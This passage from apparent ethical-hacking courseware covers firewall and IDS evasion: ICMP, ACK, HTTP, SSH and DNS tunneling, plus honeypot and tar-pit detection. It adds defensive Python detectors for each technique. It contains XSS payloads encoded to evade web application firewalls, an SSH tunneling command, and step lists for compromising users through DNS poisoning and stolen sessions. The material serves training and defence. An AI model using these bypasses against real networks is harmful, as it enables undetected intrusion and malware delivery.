The ICMP protocol is used to send an error message to the client. As it is a required service for network communication, users often enable this service on their networks. Moreover, it does not entail a significant threat from the security perspective. The attacker takes advantage of the enabled ICMP protocol on the network and performs ICMP tunneling to send his/her malicious data into the target network. The ICMP tunnel provides attackers with full access to target networks.

It allows tunneling of a backdoor shell in the data portion of ICMP Echo packets. RFC 792, which delineates ICMP operation, does not define what should go in the data portion. The payload portion is arbitrary and is not examined by most firewalls. Thus, any data can be inserted in the payload portion of the ICMP packet, including a backdoor application. Some administrators keep ICMP open on their firewall because it is useful for tools such as ping and traceroute. Assuming that ICMP is allowed through a firewall, use Loki ICMP tunneling (https://tools.cisco.com) to execute commands of choice by tunneling them inside the payload of ICMP echo packets.

Figure: Bypassing firewall through ICMP tunneling
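An added example (not courseware code) of the payload check a firewall that allows ping can apply to the Echo traffic described above: standard ping clients fill the data portion with a fixed pattern, so a payload matching neither known fill is reported when it is oversized or looks like text rather than passed as ordinary ping. The fill patterns are those of Windows ping and Linux iputils as the author knows them; the size limit and sample packets are assumptions.

```python
"""Added example (not courseware code): report ICMP Echo payloads that do not
look like ordinary ping data. Known fills are Windows ping's fixed alphabet and
iputils' incrementing bytes; MAX_NORMAL_PAYLOAD and the samples are assumptions."""
import struct
from typing import List

ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY = 8, 0
WINDOWS_FILL = b"abcdefghijklmnopqrstuvwabcdefghi"   # 32-byte default Windows ping data
TIMESTAMP_MAX = 16                                   # iputils stores a timestamp in the first bytes
MAX_NORMAL_PAYLOAD = 64                              # assumed policy limit for echo data


def parse_icmp(pkt: bytes) -> dict:
    if len(pkt) < 8:
        raise ValueError("truncated ICMP header")
    itype, code, _csum, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    return {"type": itype, "code": code, "id": ident, "seq": seq, "payload": pkt[8:]}


def is_standard_fill(payload: bytes) -> bool:
    """Windows: the fixed alphabet. iputils: data byte i holds the value i,
    after a timestamp of up to 16 bytes."""
    if payload == WINDOWS_FILL:
        return True
    return len(payload) > TIMESTAMP_MAX and all(
        payload[i] == (i & 0xFF) for i in range(TIMESTAMP_MAX, len(payload)))


def printable_ratio(payload: bytes) -> float:
    if not payload:
        return 0.0
    return sum(32 <= b < 127 or b in (9, 10, 13) for b in payload) / len(payload)


def check_echo(pkt: bytes) -> List[str]:
    """Return reasons to hold an Echo packet for inspection (empty = ordinary ping)."""
    msg = parse_icmp(pkt)
    if msg["type"] not in (ICMP_ECHO_REQUEST, ICMP_ECHO_REPLY):
        return []                      # only echo traffic is in scope here
    data = msg["payload"]
    if is_standard_fill(data):
        return []
    reasons = []
    if len(data) > MAX_NORMAL_PAYLOAD:
        reasons.append("oversized echo payload (%d bytes)" % len(data))
    if len(data) >= 4 and printable_ratio(data) > 0.9:
        reasons.append("text-like echo payload")   # commands or shell output in the data portion
    if not reasons:
        reasons.append("unknown fill pattern")
    return reasons


def build_echo(payload: bytes, itype: int = ICMP_ECHO_REQUEST, ident: int = 0x1234,
               seq: int = 1) -> bytes:
    """Constructed echo packet; the ICMP checksum is left zero as this check ignores it."""
    return struct.pack("!BBHHH", itype, 0, 0, ident, seq) + payload


SAMPLES = {   # constructed traffic
    "windows_ping": build_echo(WINDOWS_FILL),
    "linux_ping": build_echo(b"\x00" * 16 + bytes(range(16, 56))),   # default 56-byte data
    "reply_fill": build_echo(WINDOWS_FILL, itype=ICMP_ECHO_REPLY),
    "command_text": build_echo(b"uname -a\n"),
    "bulk": build_echo(bytes(range(128, 256)) * 4),
    "small_unknown": build_echo(b"\x01\x02\x03\x04"),
}
```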

Bypassing Firewalls through the ACK Tunneling Method

Ordinary packet filtering firewalls define their rule sets based on the SYN packet when TCP level communication is to be established. This is because such a firewall assumes that only the SYN packet is coming from the client and is thus likely to contain malicious code in the SYN packet. These firewalls ignore the possibility that the attacker can also inject malicious code in the ACK packet. As ACK packets are sent after establishing a session, ACK traffic is considered legitimate. In addition, the filtering of ACK packets is ignored to reduce the workload of firewalls, as there can be many ACK packets for one SYN packet. ACK tunneling allows tunneling of a backdoor application with TCP packets with the ACK bit set. The ACK bit acknowledges the receipt of a packet. As stated earlier, some firewalls do not check packets with the ACK bit set, because ACK bits are supposed to be used in response to legitimate traffic that has already been allowed to pass through. Attackers exploit this fact in ACK tunneling. Tools such as AckCmd (http://ntsecurity.nu) use ACK tunneling.
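An added example (not courseware code) of a minimal TCP connection tracker with the checks that counter the pre-connection SYN and post-connection SYN desynchronization attacks described earlier and the ACK tunneling described above: a SYN with a bad TCP checksum changes no state, a SYN or RST that does not fit an already tracked connection is ignored rather than resynchronizing the tracker, and a segment with no observed handshake is dropped even when ACK is set. Addresses, ports and sequence numbers in the scenario are constructed.

```python
"""Added example (not courseware code): a minimal TCP connection tracker with
the checks a firewall or IDS needs against pre-connection SYN, post-connection
SYN and ACK-tunneling evasion. Addresses, ports and ISNs are constructed."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Tuple

SYN, RST, PSH, ACK = 0x02, 0x04, 0x08, 0x10

def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def pseudo_header(src: bytes, dst: bytes, tcp_len: int) -> bytes:
    return src + dst + struct.pack("!BBH", 0, 6, tcp_len)

def build_tcp(src, dst, sport, dport, seq, ack, flags, payload=b"", corrupt=False) -> bytes:
    """Constructed TCP segment without IP header; corrupt=True breaks the checksum."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    csum = inet_checksum(pseudo_header(src, dst, len(hdr) + len(payload)) + hdr + payload)
    if corrupt:
        csum = (csum + 1) & 0xFFFF
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload

def checksum_ok(src: bytes, dst: bytes, seg: bytes) -> bool:
    return inet_checksum(pseudo_header(src, dst, len(seg)) + seg) == 0

@dataclass
class Flow:
    state: str       # SYN_SENT -> SYN_RECEIVED -> ESTABLISHED
    next_seq: int    # next sequence number expected from the client

class Tracker:
    def __init__(self) -> None:
        self.flows: Dict[Tuple[bytes, int, bytes, int], Flow] = {}

    def handle(self, src: bytes, dst: bytes, seg: bytes) -> Tuple[str, str]:
        """Return (verdict, reason); state changes only when a host would change state."""
        if not checksum_ok(src, dst, seg):
            return "ignore", "bad checksum"                       # pre-connection SYN
        sport, dport, seq, _ack, off, flags = struct.unpack("!HHIIBB", seg[:14])
        data_len = len(seg) - (off >> 4) * 4
        fkey, rkey = (src, sport, dst, dport), (dst, dport, src, sport)
        fwd, rev = self.flows.get(fkey), self.flows.get(rkey)   # client->server, server->client
        if flags & RST:
            if fwd is not None and seq != fwd.next_seq:
                return "ignore", "RST outside expected sequence"  # attacker's follow-up RST
            self.flows.pop(fkey, None)
            self.flows.pop(rkey, None)
            return "accept", "reset"
        if flags & SYN and not flags & ACK:
            if fwd is not None or rev is not None:
                return "ignore", "SYN for existing connection"    # post-connection SYN
            self.flows[fkey] = Flow("SYN_SENT", seq + 1)
            return "accept", "new connection"
        if flags & SYN:                                           # SYN/ACK from the server side
            if rev is not None and rev.state == "SYN_SENT":
                rev.state = "SYN_RECEIVED"
                return "accept", "SYN/ACK"
            return "drop", "unexpected SYN/ACK"
        if fwd is None and rev is None:
            return "drop", "no connection for this segment"       # ACK tunneling
        if fwd is not None and fwd.state == "SYN_RECEIVED" and flags & ACK:
            fwd.state = "ESTABLISHED"
        if (fwd or rev).state != "ESTABLISHED":
            return "drop", "handshake incomplete"
        if fwd is not None:
            if seq != fwd.next_seq:
                return "drop", "out-of-sequence data"
            fwd.next_seq += data_len
        return "accept", "data"

def demo() -> List[Tuple[str, str]]:
    """Constructed scenario: a real handshake and data, then the three evasion attempts."""
    c, s, x = bytes([10, 0, 0, 5]), bytes([10, 0, 0, 80]), bytes([10, 0, 0, 9])
    t = Tracker()
    steps = [
        (c, s, build_tcp(c, s, 40000, 80, 999, 0, SYN, corrupt=True)),   # pre-connection SYN
        (c, s, build_tcp(c, s, 40000, 80, 1000, 0, SYN)),
        (s, c, build_tcp(s, c, 80, 40000, 5000, 1001, SYN | ACK)),
        (c, s, build_tcp(c, s, 40000, 80, 1001, 5001, ACK)),
        (c, s, build_tcp(c, s, 40000, 80, 1001, 5001, ACK | PSH, b"GET")),
        (c, s, build_tcp(c, s, 40000, 80, 7777, 0, SYN)),                # post-connection SYN
        (c, s, build_tcp(c, s, 40000, 80, 7778, 0, RST)),                # attacker's RST
        (c, s, build_tcp(c, s, 40000, 80, 1004, 5001, ACK | PSH, b" /")),
        (x, s, build_tcp(x, s, 4444, 80, 42, 0, ACK, b"cmd")),           # bare ACK, no handshake
    ]
    return [t.handle(a, b, seg) for a, b, seg in steps]
```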


Bypassing Firewalls through the HTTP Tunneling Method

HTTP tunneling allows attackers to perform various Internet tasks despite the restrictions imposed by firewalls. This method can be implemented if the target company has a public web server in which port 80 is used for HTTP traffic that is unfiltered by its firewall. The attacker encapsulates data inside HTTP traffic (via port 80). Many firewalls do not examine the payload of an HTTP packet to confirm that it is legitimate. Thus, it is possible to tunnel traffic via TCP port 80. Tools such as HTTPTunnel (http://http-tunnel.sourceforge.net) use this technique of tunneling traffic across TCP port 80. HTTPTunnel is a client/server application; the client application is htc, and the server is hts. Upload the server to the target system and redirect it through TCP port

Figure 12.46: Bypassing firewall through HTTP tunneling

Why do I Need HTTP Tunneling?

HTTP tunneling is used in scenarios in which network users are granted restricted connectivity through a firewall or proxy; in such conditions, some applications may also lack native communications support.

These restrictions include:

= Blocking of TCP/IP ports, traffic initiated from outside the network, and network protocols except for a few commonly used protocols, etc.
= Surfing blocked websites
= Posting in forums anonymously by hiding the IP address
= Using an application such as chatting through ICQ or IRC, instant messengers, games, browsers, etc.
= Sharing of confidential resources over HTTP securely
= Downloading files with filtered extensions and/or with malicious code

For instance, consider that organization firewalls restrict users to access all ports except 80 and 443, and a user may want to use FTP. HTTP tunneling enables FTP use via the HTTP protocol. The HTTP tunnel creates a bidirectional virtual data connection tunneled in HTTP traffic. It works with the help of FTP client software to perform protocol encapsulation by enclosing data packets of one protocol such as SOAP or JRMP within HTTP packets on, e.g., local port 80. These packets are sent through the firewall or proxy server as normal Internet traffic, which is then directed to the HTTP tunneling server software located outside the network. Upon receiving the packets, this server unwraps the FTP data and redirects the packet to the remote FTP server.


HTTP Tunneling Tools

Some HTTP tunneling tools are as follows:

= Super Network Tunnel

Source: http://www.networktunnel.net

Super Network Tunnel is a two-way HTTP tunneling software that connects two computers using HTTP-Tunnel Client and HTTP-Tunnel Server. It works like VPN tunneling but uses the HTTP protocol to establish a connection for accessing the Internet without monitoring and provides an extra layer of protection against attackers, spyware, identity theft, and so on. It can bypass any firewall to surf the web, use IM

applications, games, and so on. Further, it integrates the SocksCap function along with bidirectional HTTP tunneling and remote control to simplify the configuration.

This tool allows HTTP, HTTPS, and SOCKS tunneling of any TCP communication between any client-server systems. The TCP traffic is sent from the client to the server via standard HTTP POST requests, which allows penetrating through firewalls, proxy servers, and so on, where HTTP traffic passes.

The client side of a tunnel is the Super Network Tunnel client app, which listens on a particular TCP port for incoming requests. Once the request comes, the program creates an HTTP/HTTPS tunnel to the server and sends data through it. The server side is the Super Network Tunnel server, running on the server computer or LAN, which simply forwards the data to the intended recipient app. Both client and server sides support multiple tunnels and multiple connections through the same tunnel at the same time.

Figure 12.48: Screenshot of Super Network Tunnel

= HTTPort and HTTHost

Source: https://www.targeted.org

HTTPort allows users to bypass the HTTP proxy, which blocks Internet access to e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC, and so on. Here, the Internet software is configured so that it connects to a local PC as if it is the required remote server. HTTPort then intercepts that connection and runs it through a tunnel through the proxy. HTTPort can work on devices such as proxies or firewalls that allow HTTP traffic. Thus, HTTPort provides access to websites and Internet apps. HTTPort performs tunneling using one of two modes: SSL/CONNECT mode or a remote host.
In the SSL/CONNECT mode, HTTPort can make a tunnel through a proxy all by itself. It requires that the proxy should support a particular HTTP feature, specifically, HTTP CONNECT. Most proxies have this method disabled by default. The SSL/CONNECT mode is much faster, but in this case, encryption cannot be used, and the proxy can track all actions.

The remote host method is capable of tunneling through any proxy. HTTPort uses a special server software called HTTHost, which is installed outside the proxy-blocked network. It is a web server; thus, when HTTPort is tunneling, it sends a series of HTTP requests to the HTTHost. The proxy responds as if the user is surfing a website and thus allows the user to do so. HTTHost, in turn, performs its half of the tunneling and communicates with the target servers. This mode is much slower but works in most cases and features strong data encryption that makes proxy logging useless.

Figure 12.49: Screenshot of HTTPort and HTTHost
Other HTTP Tunneling Tools

= Tuna (https://github.com)
= HTTPTunnel (http://http-tunnel.sourceforge.net)

Bypassing Firewalls through the SSH Tunneling Method

SSH protocol tunneling involves sending unencrypted network traffic through an SSH tunnel. For example, suppose you want to transfer files on an unencrypted FTP protocol, but the FTP protocol is blocked on the target firewall. The unencrypted data can be sent over the encrypted SSH protocol using SSH tunneling. Attackers use this technique to bypass firewall restrictions. They connect to external SSH servers and create SSH tunnels to port 80 on the remote server, thereby bypassing firewall restrictions.

Attackers use OpenSSH (OpenBSD Secure Shell) to encrypt and tunnel all traffic from a local machine to a remote machine to avoid detection by perimeter security controls. OpenSSH is a set of computer programs that provide encrypted communication sessions over a computer network using the SSH protocol.

Example:

ssh -f user@certifiedhacker.com -L 5000:certifiedhacker.com:25 -N

Here, -f => background mode; user@certifiedhacker.com => username and server you are logging into; -L 5000:certifiedhacker.com:25 => local-port:host:remote-port; and -N => do not execute the command on the remote system.

SSH Tunneling Tools

Some SSH tunneling tools are listed below:

= Bitvise

Source: https://www.bitvise.com

Bitvise SSH Server provides secure remote login capabilities to Windows workstations and servers by encrypting data during transmission. It is ideal for remote administration of Windows servers, for advanced users who wish to access their home machine from work or their work machine from home, and for a wide spectrum of advanced tasks, such as establishing a VPN using the SSH TCP/IP tunneling feature or providing a secure file depository using SFTP.

Bitvise SSH Client for Windows includes terminal emulation, graphical as well as command-line SFTP support, an FTP-to-SFTP bridge, tunneling features (including dynamic port forwarding through an integrated proxy), and remote administration for SSH Server.

Figure 12.51: Screenshot of Bitvise
= Secure Pipes

Source: https://www.opoet.com

Secure Pipes is an OS X-based SSH tunneling software. Some of the features of Secure Pipes are as follows:

o Remote Forwards: Selectively open up access to application ports that are usually not easily accessible owing to network or service provider configuration restrictions. Open the door to quickly leverage OS X Server on Internet-facing applications such as email and web hosting.
o Local Forwards: Open application communication ports to remote servers without opening those ports to public networks. Bring the security of VPN communication to clients and servers on an ad hoc basis without the hassle of configuration and management.
o SOCKS Proxies: Easily set up and manage a SOCKS proxy server for either a local client or a whole network to privatize communication and overcome local network restrictions. These tunnels are an indispensable and lightweight tool when traveling abroad, performing digital currency transactions, or simply securing a local network.

Figure 12.52: Screenshot of Secure Pipes

Bypassing Firewalls through the DNS Tunneling Method
DNS operates using UDP, and it has a 255-byte limit on outbound queries. Moreover, it allows only alphanumeric characters and hyphens. Such small size constraints on external queries allow DNS to be used as an ideal choice to perform data exfiltration by various malicious entities. Since corrupt or malicious data can be secretly embedded into the DNS protocol packets, even DNSSEC cannot detect the abnormality in DNS tunneling. It is effectively used by malware to bypass the firewall to maintain communication between the victim machine and the C&C server.
Tools such as NSTX (https://sourceforge.net), Heyoka (http://heyoka.sourceforge.net), and Iodine (https://code.kryo.se) use this technique of tunneling traffic across DNS port 53.
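As an added example (not code from the book), the following Python script shows how a defender can spot the tells described above in resolver logs: over-long labels, high-entropy subdomain data, names approaching the 255-byte limit, and record types with room for payload data. The query log and every domain name in it are constructed for the example; the thresholds and the choice of indicators are this example's own assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed sample of resolver query logs: (client_ip, query_name, query_type).
# The 32-character hex labels mimic the encoded chunks a tunnel client emits;
# the other rows are ordinary lookups. None of these names are real hosts.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com", "A"),
    ("10.0.0.5", "mail.example.com", "MX"),
    ("10.0.0.9", "4a7f9c2e1b8d3f6a0c5e9b2d7f1a4c8e.tunnel.example.net", "TXT"),
    ("10.0.0.9", "9e3b1d7c5a2f8e4b0d6c3a9f7e1b5d2c.tunnel.example.net", "TXT"),
    ("10.0.0.9", "c2d8f1a5e9b3c7d4f0a6e2b8c1d5f9a3.tunnel.example.net", "NULL"),
    ("10.0.0.7", "cdn.example.org", "A"),
]

# Record types whose answers carry free-form data, so tunnels favour them.
PAYLOAD_QTYPES = {"TXT", "NULL", "CNAME"}


def shannon_entropy(text):
    """Bits of entropy per character of text; 0.0 for the empty string."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def query_indicators(qname, qtype, max_label_len=30, entropy_threshold=3.5):
    """Return the list of tunnel indicators present in one query."""
    reasons = []
    labels = qname.lower().rstrip(".").split(".")
    # Labels left of the registered domain (taken here as the last two labels)
    # are attacker-controlled and are where a tunnel client packs encoded data.
    data_part = "".join(labels[:-2])
    if any(len(label) > max_label_len for label in labels):
        reasons.append("label longer than %d characters" % max_label_len)
    if len(data_part) >= 16 and shannon_entropy(data_part) > entropy_threshold:
        reasons.append("high-entropy subdomain data")
    if len(qname) > 200:
        reasons.append("name close to the 255-byte DNS limit")
    if qtype in PAYLOAD_QTYPES:
        reasons.append("payload-friendly query type %s" % qtype)
    return reasons


def detect_tunnels(queries, min_indicators=2):
    """Flag queries showing at least min_indicators tells and count hits per client.

    Returns (flagged, per_client): flagged maps query name -> reasons,
    per_client maps client IP -> number of flagged queries from that client.
    """
    flagged = {}
    per_client = defaultdict(int)
    for client, qname, qtype in queries:
        reasons = query_indicators(qname, qtype)
        if len(reasons) >= min_indicators:
            flagged[qname] = reasons
            per_client[client] += 1
    return flagged, dict(per_client)


if __name__ == "__main__":
    hits, clients = detect_tunnels(SAMPLE_QUERIES)
    for name, why in hits.items():
        print(name, "->", "; ".join(why))
    print("flagged queries per client:", clients)
```

Requiring two independent indicators keeps single long CDN hostnames from firing; the per-client count is what turns individual odd lookups into a tunneling alert, since a tunnel produces a steady stream of such names from one source.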

Bypassing Firewalls through External Systems
Attackers can bypass firewall restrictions of target networks from an external system that can access the internal network. This external system can be:
- A home machine of an employee
- A machine that conducts remote administration of the target network
- A machine from the company's network but located at a different place
Steps to be followed to bypass a firewall through external systems:
1. Legitimate user works with some external system to access the corporate network
2. Attacker sniffs the user traffic and steals the session ID and cookies
3. Attacker accesses the corporate network by bypassing the firewall and gets the Windows ID of the running Mozilla process on the user's system
4. Attacker then issues an OpenURL() command to the found window
5. User's web browser is redirected to the attacker's web server
6. The malicious code embedded in the attacker's web page is downloaded and executed on the user's machine

Bypassing Firewalls through MITM Attacks
Most security administrators focus on the possibility of an external or internal network bypassing their firewall while ignoring the fact that firewalls can be bypassed using MITM attacks on DNS servers. In MITM attacks, attackers use DNS servers and routing techniques to bypass firewall restrictions. They may either take over the corporate DNS server or spoof DNS responses to perform the MITM firewall attack.
Steps to be followed to bypass a firewall through MITM attacks:
1. Attacker performs DNS server poisoning
2. User requests the A record for www.certifiedhacker.com from the corporate DNS server
3. Corporate DNS server sends the IP address (127.22.16.64) of the attacker
4. User accesses the attacker's malicious server
5. Attacker connects to the real host and tunnels the user's HTTP traffic
6. The malicious code embedded in the attacker's web page is downloaded and executed on the user's machine

Bypassing Firewalls through Content
In this method, the attacker sends content containing malicious code to the user and tricks him/her into opening it so that the malicious code can be executed. For example, an attacker can send an email containing a malicious executable file or Microsoft Office document capable of exploiting a macro bypass exploit. Attackers can also target WWW/FTP servers and embed Trojan horse files as software installation files, mobile phone software, and so on to lure users into accessing them. There are many file formats for text, multimedia, and graphics content that can be used to carry malicious content.
Commonly used file formats for carrying malicious content are
- EXE, COM, BAT, PS, PDF, CDR (Corel Draw)
- DVB, DWG (AutoCAD)
- SMM (AMI Pro)
- DOC, DOT, ASD (MS Word)
- XLS, XLB, XLT, CNV (MS Excel)
- ADP, MDA, MDB, MDE, MDN, MDZ (MS Access)
- VSD (Visio)
- MPP, MPT (MS Project)
- PPT, PPS, POT (MS PowerPoint)
- MSG, OTM (MS Outlook)

Bypassing the WAF using an XSS Attack
An XSS attack exploits vulnerabilities that occur while processing the input parameters of end users and the server responses in a web application. Attackers take advantage of these vulnerabilities to inject malicious HTML code into the victim website to bypass the WAF.
Using ASCII values to bypass the WAF
In this technique, attackers use ASCII characters to bypass the WAF. For example, consider the following XSS payload:
<script>alert("XSS")</script>
When the above JavaScript code is executed, the WAF filters escape single quotes, double quotes, magic quotes, etc. Hence, the above payload is filtered by the WAF. To bypass the WAF, we need to convert the above payload into its equivalent ASCII values and then execute it. The JavaScript will automatically convert the ASCII values back into the original characters. Attackers use online websites to convert an XSS payload into its ASCII equivalent. Alternatively, the Hackbar Mozilla addon can be used to get ASCII values.
Consider the XSS payload given below:
XSS Payload: alert("XSS")
The equivalent ASCII values are
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)
The above values are inserted into the XSS payload:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)</script>
The above payload bypasses the WAF filters successfully.

Using Hex Encoding to bypass the WAF
In this technique, the entire XSS payload is replaced with hex values to bypass the WAF. Attackers use online websites such as http://www.convertstring.com/EncodeDecode/HexEncode to convert the XSS payload into equivalent hex values. For example, consider the following XSS payload:
<script>alert("XSS")</script>
The encoded value for the XSS payload is
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E
The above payload bypasses the WAF filters successfully.
Using Obfuscation to bypass the WAF
Attackers use the obfuscation technique to bypass the WAF. In this technique, attackers use a combination of upper- and lower-case letters in the XSS payload. For example, consider the following XSS payload:
<script>alert("XSS")</script>
Using obfuscation, the above payload is replaced with
<SCRiPt>aLeRT("XSS")</script>
The above payload bypasses the WAF successfully.
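The three variants above all defeat a filter that matches raw request bytes case-sensitively and without decoding. The Python below, an added example rather than code from the book, contrasts such a naive filter with one that canonicalises input (URL and HTML decoding until the text stops changing, case folding, and expansion of String.fromCharCode calls) before matching. The payload strings are the book's examples; the naive and hardened pattern sets are this example's assumptions. Normalisation of this kind is a detection aid only, since the actual fix for XSS is contextual output encoding in the application.

```python
import html
import re
from urllib.parse import unquote

# The payload variants from the text, used here as constructed test inputs.
ORIGINAL = '<script>alert("XSS")</script>'
ASCII_VARIANT = '<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41)</script>'
HEX_VARIANT = '%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E'
CASE_VARIANT = '<SCRiPt>aLeRT("XSS")</script>'


def naive_filter(payload):
    """Model of the signature the text describes: a literal, case-sensitive match on
    alert( followed by a quote character, taken on the raw request bytes."""
    return 'alert("' in payload or "alert('" in payload


# Matches String.fromCharCode(...) on already lower-cased text.
FROM_CHAR_CODE = re.compile(r"string\.fromcharcode\s*\(([\d\s,]*)\)")
# Patterns applied after normalisation (assumed signature set for this example).
SUSPICIOUS = [re.compile(p) for p in (
    r"<\s*script\b", r"\balert\s*\(", r"\bon[a-z]+\s*=", r"javascript\s*:")]


def normalize(payload, max_rounds=5):
    """Canonicalise input before matching: decode URL and HTML encodings until stable,
    fold case, and replace String.fromCharCode(...) with the characters it builds."""
    text = payload
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(text))
        if decoded == text:
            break
        text = decoded
    text = text.lower()

    def expand(match):
        codes = [int(c) for c in match.group(1).replace(" ", "").split(",") if c]
        return "".join(chr(c) for c in codes if 0 <= c < 0x110000)

    return FROM_CHAR_CODE.sub(expand, text)


def hardened_filter(payload):
    """Match the signature set against the canonical form of the input."""
    canon = normalize(payload)
    return any(p.search(canon) for p in SUSPICIOUS)


if __name__ == "__main__":
    for label, p in (("original", ORIGINAL), ("ascii", ASCII_VARIANT),
                     ("hex", HEX_VARIANT), ("case", CASE_VARIANT)):
        print("%-8s naive=%-5s hardened=%s" % (label, naive_filter(p), hardened_filter(p)))
```

Decoding in a loop until the text stops changing is what handles double-encoded input; stopping after a bounded number of rounds keeps a hostile input from turning the decoder into a CPU sink.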

IDS/Firewall Evading Tools
During firewall evasion, attackers use various security-auditing tools that assess firewall behavior. This section lists some of these tools that help attackers to bypass firewall restrictions. They automate the process of bypassing firewall rules while increasing effectiveness and consuming less time.

Traffic IQ Professional
Source: https://www.idappcom.com
Traffic IQ Professional is a tool that audits and validates the behavior of security devices by generating the standard application traffic or attack traffic between two virtual machines. This tool is generally used by security personnel for assessing, auditing, and testing the behavioral characteristics of any non-proxy packet-filtering device, which can include application firewalls, IDS, IPS, routers, switches, etc. However, as this tool can generate custom attack traffic, it is extensively employed by attackers to bypass the perimeter devices installed in the target network.
Figure 12.55: Screenshot of Traffic IQ Professional
Some additional IDS/firewall evasion tools are as follows:
- Nmap (https://nmap.org)
- Metasploit (https://www.metasploit.com)
- Inundator (https://sourceforge.net)
- IDS-Evasion (https://github.com)
- Hyperion-2.0 (http://nullsecurity.net)

Packet Fragment Generator Tools
There are various packet fragment generators that attackers use to perform fragmentation attacks on firewalls to bypass them.
- Colasoft Packet Builder
Source: https://www.colasoft.com
Colasoft Packet Builder is used to create custom network packets and fragment packets. Attackers use this tool to create custom malicious packets and fragment them such that firewalls cannot detect them. They can create custom network packets such as Ethernet Packet, ARP Packet, IP Packet, TCP Packet, and UDP Packet. Security professionals use this tool to check their network's protection against attacks and intruders.

Figure 12.56: Screenshot of Colasoft Packet Builder
Some additional packet generator tools are listed below:
- CommView (https://www.tamos.com)
- NetScanTools Pro (https://www.netscantools.com)
- Ostinato (https://ostinato.org)
- WAN Killer (https://www.solarwinds.com)
- WireEdit (https://wireedit.com)

Detecting Honeypots
Honeypots are traps set to detect, deflect, or counteract unauthorized intrusion attempts. While attempting to break into the target network, attackers perform honeypot detection using various tools and techniques. This section discusses these tools and how they are used.
A honeypot is an Internet system designed primarily for diverting attackers or attracting them by tricking them during their attempts to gain unauthorized access to information systems.

Attackers can determine the presence of honeypots by probing the services running on the system. Attackers use honeypot detection systems or methods to identify the honeypots installed on the target network. They craft malicious probe packets to scan for services such as HTTP over SSL (HTTPS), SMTP over SSL (SMTPS), and IMAP over SSL (IMAPS). Ports that show a particular service running but deny a three-way handshake connection indicate the presence of a honeypot. Once they detect honeypots, attackers try to bypass them so that they can focus on targeting the actual network. Tools to detect honeypots include Send-Safe Honeypot Hunter (http://www.send-safe.com) and kippo_detect (https://github.com).
Note: Attackers can also defeat honeypots by using multi-proxies (TORs) and hiding their conversation using encryption and steganography techniques.

Detecting and Defeating Honeypots
A honeypot is a security mechanism that is deployed to counterattack and trap attackers. Honeypots lure attackers into performing malicious activities, and this attack information provides insights into the level and type of threats a network infrastructure can face. As an attacker, determining whether the target system is a legitimate one or a honeypot is essential to compromise the network without being detected. Identifying and defeating these honeypot establishments stealthily is the fundamental task of a professional hacker.

Some techniques used to identify, detect, and defeat various honeypot infrastructures are discussed below:
Detecting the presence of Layer 7 Tar Pits: Tar pits are security entities that are similar to honeypots, which are designed to respond slowly to incoming requests. They slow down unauthorized attempts of hackers. Layer 7 tar pits react slowly to incoming SMTP commands by attackers/spammers. Attackers can identify the presence of Layer 7 tar pits by looking at the latency of the response from the service.
Detecting the presence of Layer 4 Tar Pits: Layer 4 tar pits manipulate the TCP/IP stack and are effectively employed to slow down the spreading of worms, backdoors, etc. In these tar pits, the iptables accept the incoming TCP/IP connection and spontaneously switch to a zero-window size, blocking the attacker from sending further data. This connection cannot be terminated by the attacker, as no data is transferred to the target machine. Layer 4 tar pits such as Labrea can be identified by the attacker by analyzing the TCP window size, where the tar pit continuously acknowledges incoming packets even though the TCP window size is reduced to zero.
Detecting the presence of Layer 2 Tar Pits: If an attacker launches an attack from the same network, the issue of Layer 2 arises. Layer 2 tar pits are used to block the network penetration of the attacker who gains access to the network as well as to prevent internal threats. The attacker can detect the presence of this daemon by looking at the responses with the unique MAC address 0:0:f:ff:ff:ff, which acts as a kind of black hole. An attacker can also identify the presence of these tar pits by analyzing the ARP responses.
Detecting Honeypots running on VMware: VMware is a commercially available virtual machine that is used to launch multiple instances of an OS simultaneously. These virtual machines can be configured with various virtual machine resources such as CPU, memory, disks, I/O devices, etc. Owing to its numerous advantages, VMware is widely used to launch honeypots. Attackers can identify instances that are running on the VMware virtual machine by analyzing the MAC address. By looking at the IEEE standards for the current range of MAC addresses assigned to VMware Inc., an attacker can identify the presence of VMware-based honeypots.
Detecting the presence of Honeyd Honeypot: Honeyd is a widely used honeypot daemon. It is used to create thousands of honeypots easily. It is a network-simulated and service-simulated honeypot deployment engine. This honeyd honeypot can respond to a remote attacker who tries to contact the SMTP service with fake responses.

Figure 12.57: Honeyd fake response

An attacker can identify the presence of honeyd honeypot by performing time-based TCP fingerprinting methods (SYN proxy behavior). The following figure shows the difference between the response of a normal computer and the response of honeyd honeypot to a manual SYN request sent by an attacker.

Figure 12.58: Response to SYN request by normal computer vs. Honeyd Honeypot
Detecting the presence of User-Mode Linux (UML) Honeypot: User-Mode Linux is an open-source software under GNU, which is used to create virtual machines and is efficient in deploying honeypots. Attackers can identify the presence of UML honeypots by analyzing files such as /proc/mounts, /proc/interrupts, and /proc/cmdline, which contain UML-specific information.
